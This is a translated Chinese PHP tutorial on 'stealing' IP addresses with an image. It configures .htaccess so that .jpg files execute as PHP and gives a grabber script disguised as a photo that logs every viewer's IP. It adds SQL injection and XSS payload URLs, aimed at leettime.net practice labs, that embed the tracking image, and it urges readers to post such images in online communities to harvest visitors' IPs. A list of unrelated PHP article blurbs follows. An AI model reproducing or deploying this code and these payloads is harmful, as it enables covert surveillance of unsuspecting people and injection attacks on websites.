基于PHP实现通过照片获取ip地址
在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。
下面就是我们需要向.htaccess中添加的代码:
AddHandler application/x-httpd-php5 .jpg
然后将下面的代码复制到记事本中,命名为grabber.jpg
<?php $fh = fopen(‘ip_list.txt', ‘a'); fwrite($fh, $_SERVER[‘REMOTE_ADDR'].” “); fclose($fh); $im = imagecreatefromjpeg(“n00b.png”); header(‘Content-Type: image/jpeg'); imagejpeg($im); imagedestroy($im); ?>
将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。
就这样,一切工作就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。
(译者注:需要把这些东西上传至我们的个人网站空间中)
POC:
(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)
至此,我们的照片已经可以开始工作了。
接着我还想说明一下如何使用SQLi来获取ip地址。其实使用照片来盗取ip地址十分快捷,我们没有理由去使用SQLi这种方法,但是为了让读者获取到更多的知识,我还是说明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
现在,再说一下如何使用xss来获取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search
好了,就是这些了。
我们可以用这个技巧做许多有趣的事情,事实上大部分社区都允许我们发布一些照片,所以我们可以用这个方法去获取所有访问到我们照片的人的ip地址。
以上所述是小编给大家介绍的基于PHP实现通过照片获取ip地址的相关内容,希望对大家有所帮助!
相关文章
本篇文章介绍了,php 目录遍历、删除 函数的使用分析。需要的朋友参考下2013-04-04
这篇文章主要介绍了PHP实现WebService的简单示例和实现步骤,本文直接给出示例代码并分步骤讲解,需要的朋友可以参考下2015-03-03
今天小编就为大家分享一篇解决Laravel 不能创建 migration 的问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧2019-10-10
本文这里汇总了一些自己使用的和网上搜集来的php生成html静态文件的方法,非常的使用,也分析了他们的优缺点,是篇非常不错的文章,这里推荐给大家。2014-12-12
这篇文章主要介绍了ThinkPHP惯例配置文件,对于进一步了解ThinkPHP各个属性配置有很大帮助,需要的朋友可以参考下2014-07-07
这篇文章主要介绍了PHP SPL标准库之数据结构栈(SplStack)介绍,栈(Stack)是一种特殊的线性表,因为它只能在线性表的一端进行插入或删除元素(即进栈和出栈),需要的朋友可以参考下2015-05-05
最近的一个网站项目中上传图片需要生成缩略图,以减小列表页的大小,减缓服务器压力。一向崇尚简洁明了和实用的我,看到网上搜到的一个个长长的php缩略图类的时候,感到非常痛苦。我承认他们写的功能是强大一些,但是我不需要这么复杂的功能2014-05-05
这篇文章主要为大家详细介绍了PHP实现微信提现,企业付款到零钱,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2019-08-08
这篇文章主要介绍了ThinkPHP使用Ueditor的方法,详细分析了thinkPHP框架整合Ueditor编辑器的具体步骤与相关实现技巧,需要的朋友可以参考下2016-05-05
这篇文章主要介绍了thinkPHP5.0框架API优化后的友好性,结合具体实例分析了thinkPHP5.0框架进行API优化后在数据输出及错误调试方面的友好性改进,需要的朋友可以参考下2017-03-03
最新评论